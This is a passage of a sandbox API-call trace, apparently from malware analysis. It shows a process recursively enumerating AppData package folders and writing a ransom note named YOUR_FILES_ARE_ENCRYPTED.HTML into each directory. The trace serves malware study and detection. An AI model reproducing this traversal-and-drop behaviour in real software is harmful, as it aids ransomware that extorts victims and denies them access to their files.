lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\SystemAppData\\*" [0116.685] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.685] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 1 [0116.685] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 0 [0116.685] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.685] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0116.685] GetProcessHeap () returned 0x600000 [0116.685] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.686] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.687] CloseHandle (hObject=0x320) returned 1 [0116.687] GetProcessHeap () returned 0x600000 [0116.687] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.687] GetProcessHeap () returned 0x600000 [0116.687] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.687] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0116.687] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.687] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\TempState") returned 107 [0116.687] GetProcessHeap () returned 0x600000 [0116.687] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.688] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\TempState" [0116.688] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\TempState\\*" [0116.688] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName=".", cAlternateFileName="")) returned 0x626878 [0116.688] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 1 [0116.688] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184144, dwReserved1=0x3184080, cFileName="..", cAlternateFileName="")) returned 0 [0116.689] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0116.689] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0116.689] GetProcessHeap () returned 0x600000 [0116.689] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.689] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.690] CloseHandle (hObject=0x320) returned 1 [0116.690] GetProcessHeap () returned 0x600000 [0116.690] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.691] GetProcessHeap () returned 0x600000 [0116.691] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.691] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c81ad3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5c81ad3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5c81ad3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0116.691] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.691] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0116.691] GetProcessHeap () returned 0x600000 [0116.691] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.1_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.692] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0116.693] CloseHandle (hObject=0x31c) returned 1 [0116.693] GetProcessHeap () returned 0x600000 [0116.693] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.693] GetProcessHeap () returned 0x600000 [0116.693] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0116.694] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_8")) returned 1 [0116.694] StrStrIW (lpFirst="Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.694] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe") returned 95 [0116.694] GetProcessHeap () returned 0x600000 [0116.694] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0116.695] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe" [0116.695] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\*" [0116.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0116.698] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0116.698] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77a22ff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77a22ff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0116.698] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.699] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC") returned 98 [0116.699] GetProcessHeap () returned 0x600000 [0116.699] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.700] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC" [0116.700] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\*" [0116.700] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77a22ff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77a22ff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0116.707] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77a22ff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77a22ff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 1 [0116.707] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0116.707] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.707] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCache") returned 108 [0116.707] GetProcessHeap () returned 0x600000 [0116.707] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.708] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCache" [0116.708] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCache\\*" [0116.708] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.709] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName="..", cAlternateFileName="")) returned 1 [0116.709] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName="..", cAlternateFileName="")) returned 0 [0116.709] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.709] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0116.709] GetProcessHeap () returned 0x600000 [0116.709] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.710] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.727] CloseHandle (hObject=0x320) returned 1 [0116.727] GetProcessHeap () returned 0x600000 [0116.727] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.727] GetProcessHeap () returned 0x600000 [0116.727] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.728] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0116.728] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.728] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCookies") returned 110 [0116.728] GetProcessHeap () returned 0x600000 [0116.728] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.729] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCookies" [0116.729] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0116.729] FindFirstFileW (in: 